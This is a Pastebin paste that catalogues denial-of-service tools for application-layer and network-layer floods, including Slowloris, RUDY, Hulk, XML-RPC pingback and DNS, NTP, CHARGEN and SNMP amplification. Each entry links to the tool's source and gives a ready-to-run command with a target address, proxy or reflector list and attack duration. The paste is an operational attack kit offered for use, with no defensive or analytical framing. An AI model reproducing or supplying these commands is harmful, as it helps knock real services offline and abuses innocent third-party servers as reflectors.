Advertisement
Guest User

Untitled

a guest
Apr 24th, 2017
709
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.52 KB | None | 0 0
  1. Layer 7
  2.  
  3. ARME (For Apache Servers)
  4. http://pastebin.com/LFDasjnv
  5. ./arme 127.0.0.1 5000 proxies.txt 3600 0
  6.  
  7. GHP (Get / Head / Post )
  8. http://pastebin.com/TYVWdXBj
  9. ./ghp 127.0.0.1 GET 5000 proxies.txt 3600 0 %random%
  10.  
  11. Hulk (Python)
  12. http://pastebin.com/McrZ8itH
  13. python hulk.py 127.0.0.1
  14.  
  15. Rand (Perl)
  16. http://pastebin.com/6NVBnDsQ
  17. perl rand.pl 127.0.0.1 3600
  18.  
  19. R.U.D.Y
  20. http://pastebin.com/T01Ai6cN
  21. ./rudy 127.0.0.1 1 5000 proxies.txt 3600 0 %random%
  22.  
  23. SlowLoris
  24. http://pastebin.com/bdTUFzp5
  25. ./slow 127.0.0.1 5000 proxies.txt 3600 0
  26.  
  27. XML-RPC Pingback (Perl)
  28. http://pastebin.com/2EBW2HXa
  29. perl xml.pl 127.0.01 10000 xmlrpc.txt 3600
  30.  
  31. XML-RPC Pingback (PHP)
  32. http://pastebin.com/XpReaLFW
  33. php xml.php xml.txt 10000
  34.  
  35. 007 Goldeneye
  36. http://pastebin.com/wAucxLTF
  37. python 007.py 127.0.0.1
  38.  
  39. __________________________________________________________
  40.  
  41. Layer 4
  42.  
  43. DNS AMP (UDP)
  44. http://pastebin.com/neaygqpc
  45. ./amp 127.0.0.1 80 amp.txt 2 3600
  46.  
  47. CHARGEN
  48. http://pastebin.com/bYpjHQrQ
  49. ./chargen 127.0.0.1 80 chargen.txt 2 -1 3600
  50.  
  51. TCP (Advanced ESSYN)
  52. http://pastebin.com/xP42m5VR
  53. ./tcp 127.0.0.1 80 2 -1 3600
  54.  
  55. SNMP (Python Version)
  56. http://pastebin.com/H1XEct35
  57. ./snmp -t 127.0.0.1 -f snmp.txt -l 30
  58.  
  59. Spoofed UDP
  60. http://pastebin.com/3xZgZDhU
  61. ./sudp 127.0.0.1 80 5 5 3600
  62.  
  63. NTP (Python)
  64. http://pastebin.com/6feKkwZd
  65. python ntp.py 127.0.0.1 ntp.txt 5
  66.  
  67. NTP (Perl)
  68. http://pastebin.com/EdTyVxgB
  69. perl ntp.pl 127.0.0.1 80 3600 ntp.txt 5
  70.  
  71. DrDos
  72. http://pastebin.com/CYqFy4me
  73. perl drdos.pl 127.0.0.1 80 servers.txt 5 tcp 10 3600
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement